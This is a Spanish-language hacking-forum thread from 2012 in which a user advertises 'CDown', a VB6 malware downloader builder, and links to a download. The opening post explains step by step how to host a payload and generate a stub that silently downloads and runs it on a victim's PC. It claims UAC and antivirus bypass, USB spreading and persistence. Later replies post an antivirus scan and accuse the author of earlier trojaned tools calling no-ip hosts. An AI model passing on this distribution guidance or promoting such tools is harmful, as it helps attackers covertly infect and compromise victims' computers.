Autor Tema: CDown... by ¿CD? VB 6.0 / V 5.0 (Leído 892 veces)

¿CD? · « **en:** Junio 29, 2012, 09:58:20 pm »

Les presento la ultima versión del CDown..., es bastante efectiva, además al día de hoy es indetectable.

Para los que aún no sabéis la función de los downloaders es básicamente descargar y ejecutar un archivo desde un servidor web en la pc víctima ocultamente.

Para usarlo simplemente subimos el malware que queremos que se descargue y ejecute en la pc de la víctima a cualquier hosting web que soporte descarga directa de .exe ej: www.smallfiles.org. En donde dice "Descargar desde Url" colocamos la dirección completa donde se ubica nuestro archivo ej: wwww.servidor.com/carpeta/archivo.exe y donde dice "Nombre del archivo" colocamos el nombre completo del archivo ej: archivo.exe seleccionamos las opciones que más nos conviene y seguidamente damos click en "Generar ejecutable", el archivo creado sera el archivo que se enviará a la víctima. Cuando sea ejecutado por la víctima se descargara el archivo "archivo.exe" desde nuestro servidor web y se ocultara en la carpeta que hayas elegido previamente, apenas termine de descargarse se ejecutará.
Vídeo:

<a href="http://www.youtube.com/watch?v=PsJoStF9CF4" target="_blank">http://www.youtube.com/watch?v=PsJoStF9CF4</a>

Capturas de pantalla:

Características del Builder:

Compatible con windows Me, XP, 2000, Vista, Seven, etc (32 y 64 bits)
Peso del archivo: 652 KB sin comprimir

Características del Stub:

Totalmente invisible para el usuario
Saltea la UAC de Windows Vista y Seven
Saltea los firewalls y antivirus
Mutex
Peso del archivo: 44 KB sin comprimir

Opciones:

Auto Copiarse
Auto Eliminarse
Iniciar con Windows
Propagarse por Usb

Descarga: http://adf.ly/ABpYB

Contraseña del fichero.rar: ¿CD?

Salu2... Y para aguellos..., la aplicación está 100% limpia.
Por privacidad podeis utilizar algún servicio como "http://www.yopmail.com/" para recibir la contraseña.

<[Zoro]248> · « **Respuesta #1 en:** Junio 30, 2012, 07:04:24 am »

Que gran herramienta no sabia como usarla, solo me quedo una duda, el archivo a ejecutarse en la pc victima, para que pueda ejecutarse el usuario de la pc victima tiene que aceptar la descarga??..

...Saludos y gracias por tan buena herramienta..

¿CD? · « **Respuesta #2 en:** Junio 30, 2012, 10:39:13 am »

Cita de: Zoro248 en Junio 30, 2012, 07:04:24 am

Que gran herramienta no sabia como usarla, solo me quedo una duda, el archivo a ejecutarse en la pc victima, para que pueda ejecutarse el usuario de la pc victima tiene que aceptar la descarga??..

...Saludos y gracias por tan buena herramienta..

El ejecutable generado cuando sea ejecutado por la víctima se descargara el archivo "archivo.exe" desde nuestro servidor web y se ocultara en la carpeta que hayas elegido previamente, apenas termine de descargarse se ejecutará. Todo lo hace totalmente invisible para el usuario, saltea la UAC de Windows Vista y Seven, saltea los firewalls y antivirus. No hay que aceptar nada.

Salu2...

kid_goth · « **Respuesta #3 en:** Julio 01, 2012, 05:44:45 pm »

esta muy buena ¿CD? pero como no me gustan los viruses creo que no la usare, mas la tendre en mi pc guardadito por si acaso jejejeje...

Saludos y excelentes aportes los que estas dando (PD: No me sirve la pass :/)

Edito: si sirve la pass

solo qeu toca con winrar obligao

Bueno y por siaca paso el resultado de un Sacn que le hice con el scanner de udnercode... (y Salio todo bien

)

Archivo: CDown...exe
Tamaño: 667648 bytes
MD5 checksum: 1aaf9f60e44c465c27f29d36ac0a451b
Estado: Infectado
Detecciones: 4 de 35

AVG Free - Clean
ArcaVir - Clean
Avast 5 - Clean
AntiVir (Avira) - TR/Crypt.ZPACK.Gen
BitDefender - Clean
VirusBuster Internet Security - Clean
Clam Antivirus - Clean
COMODO Internet Security - Clean
Dr.Web - Clean
eTrust-Vet - Clean
F-PROT Antivirus - Clean
F-Secure Internet Security - Clean
G Data - Clean
IKARUS Security - Clean
Kaspersky Antivirus - Clean
McAfee - Clean
MS Security Essentials - Clean
ESET NOD32 - Worm.Win32/AutoRun.VB.ADG
Norman - Clean
Norton Antivirus - Clean
Panda Security - Clean
A-Squared - Clean
Quick Heal Antivirus - Clean
Rising Antivirus - Clean
Solo Antivirus - Clean
Sophos - Sus/VB-BD
Trend Micro Internet Security - Clean
VBA32 Antivirus - Clean
Vexira Antivirus - Clean
Zoner AntiVirus - Clean
Ad-Aware - Clean
BullGuard - Gen:Trojan.Heur.VP2.dm1@aqcTl9V
Immunet Antivirus - Clean
K7 Ultimate - Clean
VIPRE - Clean
Reporte generado por Underc0de Scanner

WinDeath · « **Respuesta #4 en:** Julio 03, 2012, 02:44:46 am »

Cita de: ¿CD? en Junio 29, 2012, 09:58:20 pm

Salu2... Y para aguellos..., la aplicación está 100% limpia.

¿CD?, y dime cómo podemos fiarnos de ti ahora si una de tus tools ya estaba infectada??

¿CD? · « **Respuesta #5 en:** Julio 03, 2012, 02:34:12 pm »

Solo hay q analizar la aplicación para darse cuenta q esta limpita. Todas las versiones del CDown... están limpitas.
Hay gente q cree mejor decir q una aplicación esta infectada antes q analizarla. Tu ha afirmado q el CDown... V 3.0 estaba infectado sin estar, el r@mbyte ha afirmado q el CDown... V 4.0 estaba infectado sin estar.
Creo que antes de entrar a un post y afirmar q una aplicación está infectada es mejor analizarla tener la certeza y después afirmar, no afirmar sin tener ni pu** idea d lo q dices.
Llevo en este foro desde "Marzo 01, 2011, 02:52:53 am" y en todo este tiempo te puedo afirmar sabiendo lo q digo q no he posteado ni siquiera una aplicación infectada, el Stub del CrypterP descargaba un regalito, pero si te digo la verdad cuando lo compile, ni me he dado cuenta q el stub era el modificado q tenia.
Espero q esto te sirva y una cosa más no pido q te fíes, es mejor analizar y fiar de tu análisis no de nadie.
Salu2...

WinDeath · « **Respuesta #6 en:** Julio 03, 2012, 04:45:33 pm »

Excusas...

Yo me fío sólo de mi análisis. El que esta infectado es tu cripter y si lo compilaste sin saber. ¿que me estas diciendo que lo ripeaste??.

Explícame porque cuando se ejecuta el encriptado de tu famoso cripterp, se crea la siguente clave de registro?

Y porque cuando se ejecuta ese winsp.exe que por cierto no tiene porque estar en win7, tu server se conecta a las siguientes no-ip??? christpher-pro.no-ip.org

Y cdiefenhaeler-pro.no-ip.org?

Este es demasiada casualidad que se llame como tu nick, pero bueno puede ser...

En fin, que puedes contar las historietas que quieras, cada cual sacará sus propias conclusiones. Yo personalmente creo que te has pasado de listo intentando ser mejor que nadie y que nos has tomado por tonto. Para mi sólo te quedan tres opciones: o sigues negando la evidencia hasta que la gente se canse de leer tus acualizaciones, o cambias de nick y empiezas de cero, o reconoces que te has equivocado y que te ha salido el tiro por la culata. Todos tenemos derecho a equivocarnos y por mi parte si reconoces el error a mi me basta; los demás que decidan.

No es el único foro en el que te pillan... Ya han surgido dudas y precisamente con tu Cdown de los coj*nes. Este no lo he analizado ya que prefiero emplear el poco tiempo que tengo en aprender otras cosas en lugar de andar analizando tus ejecutables..

¿CD? · « **Respuesta #7 en:** Julio 03, 2012, 05:17:31 pm »

El post es del "CDown... by ¿CD? VB 6.0 / V 5.0", aquí se debería comentar solo sobre el tema, pero bueno.

Ya he dicho q el stub del CrypterP descargaba un regalito. Yo tenia varios stub en una carpeta con distintas funciones, en el momento q lo cargue en Recursos del VB6 he cogido un con esta función por "equivocado", hacia su función correctamente, solo q también hacia de downloader y por eso descargo de "dondesea.china" un regalito.exe mio, ese era un stub de otro Crypter, un Fake, q había dejado por "dondesea.china"

Aquí no posteo nada con regalitos, lo puedo postear por ejemplo en "T*ri*ng*" o algo por estilo, no donde aprendo e reporto. De alguna forma hay q conseguir clientes... Lo siento CHOCOLATE1, no lo he dejado aquí por querer antes he hablado con GAMARRA todas mis aplicaciones están limpias, 100% solo paso lo q te digo con el PUT***... CrypterP de los COJON*S... Yo no me habia enterado. Lo siento...

r@mbyte · « **Respuesta #8 en:** Julio 08, 2012, 03:41:04 am »

Citar

infectado sin estar, el r@mbyte ha afirmado q el CDown... V 4.0 estaba infectado sin estar.
Creo que antes de entrar a un post y afirmar q una aplicación está infectada es mejor analizarla tener la certeza y después afirmar, no afirmar sin tener ni pu** idea d lo q dices.

no me hagas reir dices que no se analizar, yo habia analizado tus herramientas con wireshark y otros sniffers algunas estaban infectadas no todas

Citar

. Yo tenia varios stub en una carpeta con distintas funciones, en el momento q lo cargue en Recursos del VB6 he cogido un con esta función por "equivocado", hacia su función correctamente, solo q también hacia de downloader y por eso descargo de "dondesea.china" un regalito.exe mio, ese era un stub de otro Crypter, un Fake, q había dejado por "dondesea.china"

JAJAJAJAA no digas COJON*S vas a decir que por equivocacion tu stub de tu cripter descargaba un ejecutable tuyo y lo ejecutaba

yo ya no me fio mas de ti y prefiero aprender a programar que estar descargando tus cosas

¿CD? · « **Respuesta #9 en:** Julio 11, 2012, 08:36:48 pm »

Cita de: r@mbyte en Junio 30, 2012, 07:04:24 am

algunas estaban infectadas.

Para se exacto, una.

Cita de: r@mbyte en Junio 30, 2012, 07:04:24 am

ya no me fio mas de ti y prefiero aprender a programar que estar descargando tus cosas.

Eres libre de hacer lo que quieras...
Salu2...

Hack x Crack

Autor Tema: CDown... by ¿CD? VB 6.0 / V 5.0 (Leído 892 veces)

¿CD?

CDown... by ¿CD? VB 6.0 / V 5.0

<[Zoro]248>

Re:CDown... by ¿CD? VB 6.0 / V 5.0

¿CD?

Re:CDown... by ¿CD? VB 6.0 / V 5.0

kid_goth

Re:CDown... by ¿CD? VB 6.0 / V 5.0

WinDeath

Re:CDown... by ¿CD? VB 6.0 / V 5.0

¿CD?

Re:CDown... by ¿CD? VB 6.0 / V 5.0

WinDeath

Re:CDown... by ¿CD? VB 6.0 / V 5.0

¿CD?

Re:CDown... by ¿CD? VB 6.0 / V 5.0

r@mbyte

Re:CDown... by ¿CD? VB 6.0 / V 5.0

¿CD?

Re:CDown... by ¿CD? VB 6.0 / V 5.0